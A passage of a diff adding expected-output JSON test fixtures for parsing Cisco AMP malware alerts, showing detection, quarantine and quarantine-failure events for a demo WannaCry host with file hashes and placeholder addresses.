"service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 
2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93256, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 94442, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + 
"cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 95628, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.error.description": "Delete pending", + 
"cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 96814, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 
2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 98000, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 99186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + 
"cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 100372, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031906", + 
"cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 101558, + "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", + "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "process.name": "cmd.exe", + "process.pid": 3200, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + 
"cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 235000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 103091, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2708, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": 
"53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 172000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 104633, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": 
[ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 105894, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 423000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", 
+ "input.type": "log", + "log.offset": 107014, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064596", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 377000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 108200, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064594", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 33000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 109386, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" 
+ ], + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 110571, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": 
"Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 111942, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + 
"event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 113313, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + 
